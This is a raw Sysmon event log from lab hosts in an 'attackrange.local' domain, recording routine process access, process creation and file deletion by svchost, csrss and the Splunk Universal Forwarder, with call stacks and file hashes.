07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807546Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807545Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807544Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807543Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807542Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F4B8-60EB-7379-00000000D001}108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807541Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4B8-60EB-7379-00000000D001}108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807540Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.273{0C1E0330-F4B8-60EB-7379-00000000D001}108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807583Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.632{0C1E0330-F4B9-60EB-7579-00000000D001}3408172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807582Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.507{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92708BF4F1E2A2F8720BF51F039B46F1,SHA256=5CEA1492B5CFEE687E8355BF687EE6466E2CCFA3DBB689A59E54D00A2E411D4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807581Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.507{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31ECAC0EAB432FB89E1A409E4214C5A8,SHA256=12FE93C8792C1B3049176CB4647AE41F3FCA397FE50A80783B89B57197E35C52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807580Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.507{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68D0C7FC4FD54187DF19867D72E4513D,SHA256=EC9AC3541D8BAE625A20C0283C0754D36A9D9EA49D1A3C0F854E9D90269A9F6E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807579Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.507{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4B9-60EB-7579-00000000D001}3408C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807578Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.507{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807577Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:25.507{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807576Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807575Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807574Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807573Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807572Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807571Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807570Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807569Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F4B9-60EB-7579-00000000D001}3408C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807568Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4B9-60EB-7579-00000000D001}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807567Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.492{0C1E0330-F4B9-60EB-7579-00000000D001}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:25.409{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F64ED137E9342EE10058A1B5C84F3D6B,SHA256=6AF8C71C30F7D1D31792AB9C22CBC5ECF1DC5FD025D2374D26614D3C7B71BAD3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807611Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.850{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4BA-60EB-7779-00000000D001}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807610Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:26.850{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807609Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.850{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 